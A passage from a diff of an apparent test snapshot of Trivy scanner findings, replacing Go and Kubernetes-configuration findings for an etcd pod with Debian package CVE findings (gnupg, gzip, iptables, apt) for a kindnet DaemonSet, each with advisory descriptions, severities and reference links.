"https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2019-14855", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "https://dev.gnupg.org/T4755", + "https://eprint.iacr.org/2020/014.pdf", + "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "https://ubuntu.com/security/notices/USN-4516-1", + "https://usn.ubuntu.com/4516-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-14855", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/52313", - }, - { - "type": "URL", - "value": "https://go.dev/cl/399539", - }, - { - "type": "URL", - "value": "https://go.dev/cl/400074", - }, - { - "type": "URL", - "value": "https://go.dev/issue/52313", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-14855", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-14855", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://dev.gnupg.org/T4755", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://eprint.iacr.org/2020/014.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://ubuntu.com/security/notices/USN-4516-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://usn.ubuntu.com/4516-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3219", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/security/cve/CVE-2022-3219", + "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "denial of service issue (resource consumption) using compressed packets", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "1.9-3+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.9-3", + "packageName": "gzip", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://security.gentoo.org/glsa/202209-01", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", ], }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -76231,86 +78194,47 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "iptables", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], "severity": "LOW", @@ -76318,10 +78242,10 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2011-3374", - "installedVersion": "2.2.4", - "packageName": "apt", + "installedVersion": "1.8.2.2", + "packageName": "libapt-pkg5.0", "references": [ "https://access.redhat.com/security/cve/cve-2011-3374", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", @@ -76334,7 +78258,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": 